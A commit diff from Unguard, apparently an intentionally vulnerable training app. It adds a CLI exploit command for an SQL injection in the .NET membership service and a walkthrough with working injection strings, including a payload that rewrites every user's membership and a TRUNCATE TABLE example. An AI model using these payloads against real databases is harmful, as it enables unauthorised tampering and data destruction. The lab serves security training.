dynatrace-oss · sassko · Apr 9, 2024 · Apr 3, 2024
@@ -319,6 +319,46 @@ def sql_inject_h2(sql_command, target):
     click.echo('Request returned status code %s.' % str(r.status_code))
     click.secho('Exploit executed.', fg="green")
 
+
+@cli.command()
+@click.option('--target',
+              prompt='Unguard frontend',
+              default='unguard.kube',
+              help='The host and port where Unguard frontend runs')
+@click.option('--sql-command',
+              prompt='SQL Command',
+              help='SQL command to be executed. E.g.: "UPDATE membership SET membership = \'injected\' WHERE 1 = 1;"')
+def sql_inject_dotnet(sql_command, target):
+    """
+    Sends an SQL command to be executed on the MariaDB database through an SQLi vulnerability in the membership-service (.NET).
+    """
+    session = requests.session()
+    if not logged_in(session):
+        click.echo("Not logged in. Run login command first.")
+        return
+
+    decoded_jwt = jwt.decode(session.cookies.get('jwt'), options={"verify_signature": False})
+    username = decoded_jwt['username']
+
+    sql_command = str.strip(sql_command)  # remove unnecessary leading and trailing whitespace
+
+    # if not already at the end of command, add semicolon to eliminate potential cause of syntax error
+    if not sql_command.endswith(";"):
+        sql_command += ";"
+
+    sql_command = "FREE\") ON DUPLICATE KEY UPDATE membership=\"FREE\"; " + sql_command + " -- "
+
+    r = session.post(f'http://{target + frontend_base_path}/membership/{username}', data={'membershipText': sql_command},
+                     allow_redirects=False)
+
+    click.echo('Request returned status code %s.' % str(r.status_code))
+    # status code 400 is returned if e.g. the table is truncated and no membership exists anymore
+    if r.status_code == 302 or r.status_code == 400:
+        click.secho('Exploit executed.', fg="green")
+    else:
+        click.secho('Exploit failed.', fg="red")
+
+
 @cli.command()
 @click.option('--target',
               prompt='Unguard frontend',

@@ -1,6 +1,7 @@
 # SQL injection
 
-Unguard has three SQL injection vulnerabilities:
+Unguard has four SQL injection vulnerabilities:
 * [One in the Java `profile-service`](./SQLI-PROFILE-SERVICE-H2.md), which is exploitable through the user biography and allows you to access the h2 database.
 * [One in the Golang `status-service`](./SQLI-STATUS-SERVICE-MARIADB.md), which is exploitable through the search bar on the Users page and allows you to access the MariaDB database.
 * [One in the PHP `like-service`](./SQLI-LIKE-SERVICE-REMOVE-LIKE.md), which allows you to remove another user's like on a given post.
+* [One in the .NET `membership-service`](./SQLI-MEMBERSHIP-SERVICE-MARIADB.md), which allows you to add or change another user's membership state.
@@ -0,0 +1,71 @@
+# SQL Injection
+
+Utilizing [SQL injection](https://owasp.org/www-community/attacks/SQL_Injection) can lead to sensitive data being read
+and/or databases to be modified (Insert/Update/Delete).
+In addition, administrative operations such as shutting down the DBMS can also be completed.
+
+Unguard provides the functionality to insert specific membership texts for users on the profile page, and as the membership text
+is not checked before being inserted into an SQL statement, it is possible to insert SQL commands which will then be run.
+
+## Preconditions and Requirements
+
+For this exploit to work you need:
+
+* [unguard](../../../docs/DEV-GUIDE.md) deployed and running
+* (optional) [unguard-exploit-toolkit](../../INSTALL.md) set up
+
+## Exploitation
+
+To inject an SQL command, you simply need to log into Unguard, go to your profile page and click on the membership banner next to
+your user text. In the dropdown on the membership page you can either choose between PRO and FREE membership or insert
+SQL statements which need to be properly prepared (see the next chapter "w/o Toolkit CLI").
+
+### w/o Toolkit CLI
+
+SQL injections are possible via the frontend. As mentioned before, you can insert a membership text including SQL
+code on the membership plan's page.
+
+An example for an SQL statement to run:
+
+```sql
+INSERT INTO membership (userid,membership)
+VALUES (1,"hacked")
+ON DUPLICATE KEY UPDATE membership="hacked"
+```
+
+This will set every user's membership to 'hacked'.
+
+To have this executed on the database, you need to modify the SQL command:
+```
+ hacked") ON DUPLICATE KEY UPDATE membership="hacked"; --
+```
+
+This snippet can simply be added to the membership freetext field, giving the current user the membership 'hacked'.
+
+### With Toolkit CLI
+
+Using the `ug-exploit` tool, SQL statements can be injected.
+Make sure to use `ug-exploit login` first, as you need to be logged in to change the membership state.
+
+Afterwards, use `ug-exploit sql-inject-dotnet` and type your desired command.
+When using the CLI, you only need to specify the SQL statement to be injected. In this example,
+your input would just need to be:
+
+```sql
+UPDATE membership
+SET membership = 'injected'
+WHERE 1 = 1;
+```
+
+A status code of 302 means that the statement was successfully executed, and 500 means that there was an error.
+
+#### Examples
+
+Deleting all entries of the table:
+```sql
+TRUNCATE TABLE membership;
+```
+
+## Further Details
+
+* [SQL Injection - OWASP](https://owasp.org/www-community/attacks/SQL_Injection)
@@ -58,7 +58,7 @@ In this case, the beginning has to be slightly different to accommodate the synt
 Using the `ug-exploit` tool, SQL statements can be injected.
 Make sure to use `ug-exploit login` first, as you need to be logged in to post a bio.
 
-Afterwards, use `ug-exploit sql-inject` and type your desired command.
+Afterwards, use `ug-exploit sql-inject-h2` and type your desired command.
 When using the CLI, you only need to specify the SQL statement to be injected. In this example,
 your input would just need to be: